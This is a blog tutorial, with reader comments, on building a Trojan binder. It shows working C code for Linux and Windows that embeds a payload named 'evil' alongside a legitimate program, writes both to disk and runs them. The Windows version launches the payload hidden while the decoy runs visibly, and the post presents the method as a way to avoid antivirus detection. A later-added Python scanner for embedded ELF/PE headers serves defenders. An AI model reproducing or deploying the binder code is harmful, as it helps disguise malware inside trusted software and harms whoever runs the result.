Create your own Trojan binder
1. Introduction
Sometimes you would like to merge your own piece of code (Trojan, joke, …) into a legitimate executable file, under Windows or Linux. Unfortunately, the binder tools you download from the Internet are detected by anti-virus software. Worse, they are often viruses themselves. Actually, binding two files is not an exploit: with a bit of C/C++ you can easily create your own binder.
This post explains how to create a valid executable file that actually contains two executable files. We will not write a full binder from scratch, but only give you the basic idea needed to do it yourself.
1.1. Requirements
- We assume you know how to develop and compile C programs under Linux or Windows.
- The hexdump utility.
1.2. The steps
The idea is to dump the initial executable files as hexadecimal into C variables, like this:
unsigned char evil[] = { 0xaa, 0xaa, 0xaa, ... , 0xaa };
unsigned char real_prog[] = { 0xbb, 0xbb, 0xbb, ... , 0xbb };
Next you have to write a C function that recreates the files locally at run time and executes both of them (in the foreground or in the background). System calls such as open(), write(), fork() and exec() will be used on Linux, CreateProcess() and the like on Windows.
2. Let's practice
2.1. Dumping binary into C variables
In order to dump an executable file, you need the hexdump utility (we will use it under Linux). Use the following syntax to try it yourself:
[root@host ]$ cat evil.exe | hexdump -v -e '"0x" 1/1 "%02X" ","'
0x7F,0x45,0x4C,0x46,0x01,0x01,0x01,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB4,0x08,0x00,0x00,
0x00,....
It's time to create the C variables. We will store them in a C header file (.h). Strictly speaking, it is not good practice to define a variable inside a header file; the definition usually belongs in the ".c" file (the module). But for clarity, we will make an exception.
[root@host ]$ echo "const unsigned char evil[] = {" > hex-evil.h
[root@host ]$ cat evil.exe | hexdump -v -e '"0x" 1/1 "%02X" ","' | sed 's/,$//' >> hex-evil.h
[root@host ]$ echo "};" >> hex-evil.h
Do the same for the second binary.
[root@host ]$ echo "const unsigned char real_prog[] = {" > hex-real-prog.h
[root@host ]$ cat real-prog.exe | hexdump -v -e '"0x" 1/1 "%02X" ","' | sed 's/,$//' >> hex-real-prog.h
[root@host ]$ echo "};" >> hex-real-prog.h
2.2. Re-create binary files at runtime, and execute them
Recreating the files is only a matter of writing the variable contents back into a newly created file.
For Linux, create C functions like these:
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/stat.h>
#include "hex-evil.h"
#include "hex-real-prog.h"

int recreate_binary()
{
    FILE *file;

    // evilcode
    file = fopen("evil.bin", "w");
    if (file) {
        fwrite(evil, 1, sizeof(evil), file);
        fclose(file);
        chmod("evil.bin", 0755);
    } else
        return 1;

    // realprog
    file = fopen("realprog.bin", "w");
    if (file) {
        fwrite(real_prog, 1, sizeof(real_prog), file);
        fclose(file);
        chmod("realprog.bin", 0755);
    } else
        return 1;

    return 0;
}

int execute_binary()
{
    signal(SIGCHLD, SIG_IGN); // avoid zombies, we don't need exit info from the children
    int pidMt;

    // execl() takes a path, not a PATH lookup, so "evil.bin" is relative to the cwd
    if ((pidMt = fork()) == 0) {
        execl("evil.bin", "evil.bin", (char *) 0);
        perror("exec failed");
        exit(1); // only reached if exec failed
    }
    if ((pidMt = fork()) == 0) {
        execl("realprog.bin", "realprog.bin", (char *) 0);
        perror("exec failed");
        exit(1); // only reached if exec failed
    }
    return 0;
}
For Windows, this is the equivalent (only the write-and-run part is shown):
// file (HANDLE), written (DWORD), the *_filename strings and the *_data / *_len
// arrays are assumed to be declared elsewhere, as in the Linux version above.

// Create and run "evil code" (silently)
file = CreateFile(evil_filename, GENERIC_WRITE, FILE_SHARE_WRITE, 0,
                  CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
WriteFile(file, evil_data, evil_len, &written, 0);
CloseHandle(file);
// Run it (silently)
ShellExecute(0, "open", evil_filename, NULL, NULL, SW_HIDE);

// Create and run "legitimate prog" (foreground)
file = CreateFile(calculator_filename, GENERIC_WRITE, FILE_SHARE_WRITE, 0,
                  CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
WriteFile(file, calculator_data, calculator_len, &written, 0);
CloseHandle(file);
ShellExecute(0, "open", calculator_filename, NULL, NULL, SW_SHOWDEFAULT);
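The same layout is what a defender can key on: the binder stores each payload verbatim, so the payload's own header (the 0x7F 0x45 0x4C 0x46 ELF magic seen in the hexdump above, or the MZ/PE pair for Windows images) survives intact inside the host's data section at a non-zero offset. The scanner below is an added example, not code from the original post; it checks the ELF e_ident and the PE e_lfanew pointer so that stray magic bytes are not flagged, and runs on a constructed sample blob when no file is given.

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
DOS_MAGIC = b"MZ"

def _looks_like_elf(data, off):
    # e_ident sanity: EI_CLASS (1=32-bit, 2=64-bit), EI_DATA (1=LE, 2=BE), EI_VERSION == 1
    if len(data) < off + 16:
        return False
    return data[off + 4] in (1, 2) and data[off + 5] in (1, 2) and data[off + 6] == 1

def _looks_like_pe(data, off):
    # A DOS stub is 64 bytes; e_lfanew at +0x3C must point to the "PE\0\0" signature
    if len(data) < off + 64:
        return False
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    sig = off + e_lfanew
    return 0x40 <= e_lfanew < 0x1000 and data[sig:sig + 4] == b"PE\0\0"

def find_embedded_executables(data):
    """Return sorted (offset, kind) pairs for ELF/PE headers found past offset 0."""
    hits = []
    for magic, kind, check in ((ELF_MAGIC, "ELF", _looks_like_elf),
                               (DOS_MAGIC, "PE", _looks_like_pe)):
        pos = data.find(magic, 1)          # offset 0 is the host's own header
        while pos != -1:
            if check(data, pos):
                hits.append((pos, kind))
            pos = data.find(magic, pos + 1)
    return sorted(hits)

def build_sample():
    """Constructed stand-in for a binder output: host ELF ident, then two embedded images."""
    host = ELF_MAGIC + bytes([2, 1, 1]) + b"\x00" * 49          # 56 bytes
    payload_elf = ELF_MAGIC + bytes([1, 1, 1]) + b"\x00" * 49   # 32-bit LE, as in the hexdump
    dos = bytearray(64)
    dos[0:2] = DOS_MAGIC
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew -> right after the stub
    payload_pe = bytes(dos) + b"PE\0\0" + b"\x00" * 20
    return host + payload_elf + b"\x00" * 8 + payload_pe

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for off, kind in find_embedded_executables(blob):
        print(f"{kind} header at offset {off:#x}")
```

Run it against a suspect file (`python scan.py suspect.bin`); a second ELF or PE header well past offset 0 is the hallmark of a dropper of this kind.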
3. The end
It's time to put everything together. Hope you enjoyed it.
© 2010 – 2014, foip. All rights reserved.
Sir, thanks for the wonderful guide. The Linux code is working perfectly fine. Facing a problem with the Windows code. Please tell me the complete code for Windows.
In Windows it shows an error that it cannot run in 64-bit Windows.
You must first learn how to develop and compile code under Windows, then try again...